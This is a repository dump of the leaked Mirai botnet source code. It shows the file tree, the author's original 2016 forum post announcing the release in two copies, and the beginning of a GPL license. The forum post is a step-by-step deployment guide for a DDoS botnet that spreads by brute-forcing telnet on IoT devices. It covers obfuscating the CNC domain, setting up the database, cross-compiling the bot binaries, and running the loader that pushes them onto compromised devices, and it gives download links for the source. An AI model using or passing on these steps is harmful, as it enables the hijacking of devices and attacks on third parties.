Showing preview only (439K chars total). Download the full file or copy to clipboard to get everything.
Repository: jgamblin/Mirai-Source-Code
Branch: master
Commit: 4889a6f79723
Files: 78
Total size: 419.3 KB
Directory structure:
gitextract_oqbw3e49/
├── ForumPost.md
├── ForumPost.txt
├── LICENSE.md
├── README.md
├── dlr/
│ ├── build.sh
│ ├── main.c
│ └── release/
│ ├── dlr.arm
│ ├── dlr.arm7
│ ├── dlr.m68k
│ ├── dlr.mips
│ ├── dlr.mpsl
│ ├── dlr.ppc
│ ├── dlr.sh4
│ └── dlr.spc
├── loader/
│ ├── bins/
│ │ ├── dlr.arm
│ │ ├── dlr.arm7
│ │ ├── dlr.m68k
│ │ ├── dlr.mips
│ │ ├── dlr.mpsl
│ │ ├── dlr.ppc
│ │ ├── dlr.sh4
│ │ ├── dlr.spc
│ │ └── dlr.x86
│ ├── build.debug.sh
│ ├── build.sh
│ └── src/
│ ├── binary.c
│ ├── connection.c
│ ├── headers/
│ │ ├── binary.h
│ │ ├── connection.h
│ │ ├── includes.h
│ │ ├── server.h
│ │ ├── telnet_info.h
│ │ └── util.h
│ ├── main.c
│ ├── server.c
│ ├── telnet_info.c
│ └── util.c
├── mirai/
│ ├── bot/
│ │ ├── attack.c
│ │ ├── attack.h
│ │ ├── attack_app.c
│ │ ├── attack_gre.c
│ │ ├── attack_tcp.c
│ │ ├── attack_udp.c
│ │ ├── checksum.c
│ │ ├── checksum.h
│ │ ├── includes.h
│ │ ├── killer.c
│ │ ├── killer.h
│ │ ├── main.c
│ │ ├── protocol.h
│ │ ├── rand.c
│ │ ├── rand.h
│ │ ├── resolv.c
│ │ ├── resolv.h
│ │ ├── scanner.c
│ │ ├── scanner.h
│ │ ├── table.c
│ │ ├── table.h
│ │ ├── util.c
│ │ └── util.h
│ ├── build.sh
│ ├── cnc/
│ │ ├── admin.go
│ │ ├── api.go
│ │ ├── attack.go
│ │ ├── bot.go
│ │ ├── clientList.go
│ │ ├── constants.go
│ │ ├── database.go
│ │ └── main.go
│ ├── prompt.txt
│ └── tools/
│ ├── badbot.c
│ ├── enc.c
│ ├── nogdb.c
│ ├── scanListen.go
│ ├── single_load.c
│ └── wget.c
└── scripts/
├── cross-compile.sh
└── db.sql
================================================
FILE CONTENTS
================================================
================================================
FILE: ForumPost.md
================================================
* Original quote from: [Anna-senpai](https://hackforums.net/showthread.php?tid=5420472)
* Date posted: Fri 30 Sep 19:50:52 UTC 2016
* [See original archived post](ForumPost.txt)
# Preface
Greetz everybody,
When I first go in DDoS industry, I wasn't planning on staying in it long. I
made my money, there's lots of eyes looking at IOT now, so it's time to GTFO.
However, I know every skid and their mama, it's their wet dream to have
something besides qbot.
So today, I have an amazing release for you. With Mirai, I usually pull max 380k
bots from telnet alone. However, after the Kreb DDoS, ISPs been slowly shutting
down and cleaning up their act. Today, max pull is about 300k bots, and
dropping.
So, I am your senpai, and I will treat you real nice, my hf-chan.
And to everyone that thought they were doing anything by hitting my CNC, I had
good laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to
reconnect, lol
Also, shoutout to this blog post by malwaremustdie
* http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
* https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
<- backup in case low quality reverse engineer unixfreaxjp decides to edit his
posts lol
Had a lot of respect for you, thought you were good reverser, but you
really just completely and totally failed in reversing this binary. "We still
have better kung fu than you kiddos" don't make me laugh please, you made so
many mistakes and even confused some different binaries with my. LOL
Let me give you some slaps back -
1. port `48101` is not for back connect, it is for control to prevent multiple
instances of bot running together
2. `/dev/watchdog` and `/dev/misc` are not for "making the delay", it for
preventing system from hanging. This one is low-hanging fruit, so sad that
you are extremely dumb
3. You failed and thought `FAKE_CNC_ADDR` and `FAKE_CNC_PORT` was real CNC, lol
"And doing the backdoor to connect via HTTP on 65.222.202.53". you got
tripped up by signal flow ;) try harder skiddo
4. Your skeleton tool sucks ass, it thought the attack decoder was "sinden
style", but it does not even use a text-based protocol? CNC and bot
communicate over binary protocol
5. you say 'chroot("/") so predictable like torlus' but you don't understand,
some others kill based on cwd. It shows how out-of-the-loop you are with real
malware. Go back to skidland
5 slaps for you
Why are you writing reverse engineer tools? You cannot even correctly reverse in
the first place. Please learn some skills first before trying to impress others.
Your arrogance in declaring how you "beat me" with your dumb kung-fu statement
made me laugh so hard while eating my SO had to pat me on the back.
Just as I forever be free, you will be doomed to mediocracy forever.
# Requirements
### Bare Minimum
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading
### Pro Setup (my setup)
2 VPS and 4 servers
* 1 VPS with extremely bulletproof host for database server
* 1 VPS, rootkitted, for scanReceiver and distributor
* 1 server for CNC (used like 2% CPU with 400k bots)
* 3x 10gbps NForce servers for loading (distributor distributes to 3 servers
equally)
# Infrastructure Overview
* To establish connection to CNC, bots resolve a domain
([`resolv.c`](mirai/bot/resolv.c)/[`resolv.h`](mirai/bot/resolv.h)) and
connect to that IP address
* Bots brute telnet using an advanced SYN scanner that is around 80x faster than
the one in qbot, and uses almost 20x less resources. When finding bruted
result, bot resolves another domain and reports it. This is chained to a
separate server to automatically load onto devices as results come in.
* Bruted results are sent by default on port 48101. The utility called
scanListen.go in tools is used to receive bruted results (I was getting around
500 bruted results per second at peak). If you build in debug mode, you should
see the utitlity scanListen binary appear in debug folder.
Mirai uses a spreading mechanism similar to self-rep, but what I call
"real-time-load". Basically, bots brute results, send it to a server listening
with `scanListen` utility, which sends the results to the loader. This loop
(`brute -> scanListen -> load -> brute`) is known as real time loading.
The loader can be configured to use multiple IP address to bypass port
exhaustion in linux (there are limited number of ports available, which means
that there is not enough variation in tuple to get more than 65k simultaneous
outbound connections - in theory, this value lot less). I would have maybe 60k -
70k simultaneous outbound connections (simultaneous loading) spread out across 5
IPs.
# Configuring Bot
Bot has several configuration options that are obfuscated in `table.c/table.h`.
In [`./mirai/bot/table.h`](mirai/bot/table.h) you can find most descriptions for
configuration options. However, in [`./mirai/bot/table.c`](mirai/bot/table.c)
there are a few options you *need* to change to get working.
* `TABLE_CNC_DOMAIN` - Domain name of CNC to connect to - DDoS avoidance very
fun with mirai, people try to hit my CNC but I update it faster than they can
find new IPs, lol. Retards :)
* `TABLE_CNC_PORT` - Port to connect to, its set to 23 already
* `TABLE_SCAN_CB_DOMAIN` - When finding bruted results, this domain it is
reported to
* `TABLE_SCAN_CB_PORT` - Port to connect to for bruted results, it is set to
`48101` already.
In [`./mirai/tools`](mirai/tools) you will find something called enc.c - You
must compile this to output things to put in the table.c file
Run this inside mirai directory
./build.sh debug telnet
You will get some errors related to cross-compilers not being there if you have
not configured them. This is ok, won't affect compiling the enc tool
Now, in the `./mirai/debug` folder you should see a compiled binary called enc.
For example, to get obfuscated string for domain name for bots to connect to,
use this:
./debug/enc string fuck.the.police.com
The output should look like this
XOR'ing 20 bytes of data...
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
To update the `TABLE_CNC_DOMAIN` value for example, replace that long hex string
with the one provided by enc tool. Also, you see `XOR'ing 20 bytes of data`.
This value must replace the last argument tas well. So for example, the table.c
line originally looks like this
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
Now that we know value from enc tool, we update it like this
add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22", 20); // fuck.the.police.com
Some values are strings, some are port (uint16 in network order / big endian).
# Configuring CNC
apt-get install mysql-server mysql-client
CNC requires database to work. When you install database, go into it and run
following commands: http://pastebin.com/86d0iL9g (ref:
[`db.sql`](scripts/db.sql))
This will create database for you. To add your user,
INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, '');
Now, go into file [`./mirai/cnc/main.go`](mirai/cnc/main.go)
Edit these values
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "password"
const DatabaseTable string = "mirai"
To the information for the mysql server you just installed
# Setting Up Cross Compilers
Cross compilers are easy, follow the instructions at this link to set up. You
must restart your system or reload .bashrc file for these changes to take
effect.
http://pastebin.com/1rRCc3aD (ref:
[`cross-compile.sh`](scripts/cross-compile.sh))
# Building CNC+Bot
The CNC, bot, and related tools:
1. http://santasbigcandycane.cx/mirai.src.zip - *THESE LINKS WILL NOT LAST
FOREVER, 2 WEEKS MAX - BACK IT UP!*<br>
2. http://santasbigcandycane.cx/loader.src.zip - *THESE LINKS WILL NOT LAST
FOREVER, 2 WEEKS MAX - BACK IT UP!*
### How to build bot + CNC
In mirai folder, there is [`build.sh`](mirai/build.sh) script.
./build.sh debug telnet
Will output debug binaries of bot that will not daemonize and print out info
about if it can connect to CNC, etc, status of floods, etc. Compiles to
`./mirai/debug` folder
./build.sh release telnet
Will output production-ready binaries of bot that are extremely stripped, small
(about 60K) that should be loaded onto devices. Compiles all binaries in format:
`mirai.$ARCH` to `./mirai/release` folder
# Building Echo Loader
Loader reads telnet entries from STDIN in following format:
ip:port user:pass
It detects if there is wget or tftp, and tries to download the binary using
that. If not, it will echoload a tiny binary (about 1kb) that will suffice as
wget.
./build.sh
Will build the loader, optimized, production use, no fuss. If you have a file in
formats used for loading, you can do this
cat file.txt | ./loader
Remember to `ulimit`!
Just so it's clear, I'm not providing any kind of 1 on 1 help tutorials or shit,
too much time. All scripts and everything are included to set up working botnet
in under 1 hours. I am willing to help if you have individual questions (how
come CNC not connecting to database, I did this this this blah blah), but not
questions like "My bot not connect, fix it"
================================================
FILE: ForumPost.txt
================================================
[FREE] World's Largest Net:Mirai Botnet, Client, Echo Loader, CNC source code release - Anna-senpai - 09-30-2016 11:50 AM
Preface
Greetz everybody,
When I first go in DDoS industry, I wasn't planning on staying in it long. I made my money, there's lots of eyes looking at IOT now, so it's time to GTFO. However, I know every skid and their mama, it's their wet dream to have something besides qbot.
So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping.
So, I am your senpai, and I will treat you real nice, my hf-chan.
And to everyone that thought they were doing anything by hitting my CNC, I had good laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lol
Also, shoutout to this blog post by malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html <- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Had a lot of respect for you, thought you were good reverser, but you really just completely and totally failed in reversing this binary. "We still have better kung fu than you kiddos" don't make me laugh please, you made so many mistakes and even confused some different binaries with my. LOL
Let me give you some slaps back -
1) port 48101 is not for back connect, it is for control to prevent multiple instances of bot running together
2) /dev/watchdog and /dev/misc are not for "making the delay", it for preventing system from hanging. This one is low-hanging fruit, so sad that you are extremely dumb
3) You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol "And doing the backdoor to connect via HTTP on 65.222.202.53". you got tripped up by signal flow ;) try harder skiddo
4) Your skeleton tool sucks ass, it thought the attack decoder was "sinden style", but it does not even use a text-based protocol? CNC and bot communicate over binary protocol
5) you say 'chroot("/") so predictable like torlus' but you don't understand, some others kill based on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland
5 slaps for you
Why are you writing reverse engineer tools? You cannot even correctly reverse in the first place. Please learn some skills first before trying to impress others. Your arrogance in declaring how you "beat me" with your dumb kung-fu statement made me laugh so hard while eating my SO had to pat me on the back.
Just as I forever be free, you will be doomed to mediocracy forever.
Requirements
Bare Minimum
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading
Pro Setup (my setup)
2 VPS and 4 servers
- 1 VPS with extremely bulletproof host for database server
- 1 VPS, rootkitted, for scanReceiver and distributor
- 1 server for CNC (used like 2% CPU with 400k bots)
- 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)
Infrastructure Overview
- To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address
- Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
- Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utitlity scanListen binary appear in debug folder.
Mirai uses a spreading mechanism similar to self-rep, but what I call "real-time-load". Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.
The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections - in theory, this value lot less). I would have maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.
Configuring Bot
Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.
- TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards :)
- TABLE_CNC_PORT - Port to connect to, its set to 23 already
- TABLE_SCAN_CB_DOMAIN - When finding bruted results, this domain it is reported to
- TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101 already.
In ./mirai/tools you will find something called enc.c - You must compile this to output things to put in the table.c file
Run this inside mirai directory
Code:
./build.sh debug telnet
You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won't affect compiling the enc tool
Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:
Code:
./debug/enc string fuck.the.police.com
The output should look like this
Code:
XOR'ing 20 bytes of data...
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see "XOR'ing 20 bytes of data". This value must replace the last argument tas well. So for example, the table.c line originally looks like this
[/code]
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
[/code]
Now that we know value from enc tool, we update it like this
Code:
add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22", 20); // fuck.the.police.com
Some values are strings, some are port (uint16 in network order / big endian).
Configuring CNC
Code:
apt-get install mysql-server mysql-client
CNC requires database to work. When you install database, go into it and run following commands:
http://pastebin.com/86d0iL9g
This will create database for you. To add your user,
Code:
INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, '');
Now, go into file ./mirai/cnc/main.go
Edit these values
Code:
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "password"
const DatabaseTable string = "mirai"
To the information for the mysql server you just installed
Setting Up Cross Compilers
Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.
http://pastebin.com/1rRCc3aD
Building CNC+Bot
The CNC, bot, and related tools:
1) http://santasbigcandycane.cx/mirai.src.zip - THESE LINKS WILL NOT LAST FOREVER, 2 WEEKS MAX - BACK IT UP!
[Image: BVc7qJs.png]
2) http://santasbigcandycane.cx/loader.src.zip - THESE LINKS WILL NOT LAST FOREVER, 2 WEEKS MAX - BACK IT UP!
How to build bot + CNC
In mirai folder, there is build.sh script.
Code:
./build.sh debug telnet
Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder
Code:
./build.sh release telnet
Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: "mirai.$ARCH" to ./mirai/release folder
Building Echo Loader
Loader reads telnet entries from STDIN in following format:
Code:
ip:port user:pass
It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget. You can find code to compile the tiny downloader stub h ere
http://santasbigcandycane.cx/dlr.src.zip
You need to edit your main.c for the dlr to include the HTTP server IP. The idea is, if the iot device doesn have tftp or wget, then it will echo load this 2kb binary, which download the real binary, since echo loading really slow.
When you compile, place your dlr.* files into the folder ./bins for the loader
Code:
./build.sh
Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this
Code:
cat file.txt | ./loader
Remember to ulimit!
Just so it's clear, I'm not providing any kind of 1 on 1 help tutorials or shit, too much time. All scripts and everything are included to set up working botnet in under 1 hours. I am willing to help if you have individual questions (how come CNC not connecting to database, I did this this this blah blah), but not questions like "My bot not connect, fix it"
================================================
FILE: LICENSE.md
================================================
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
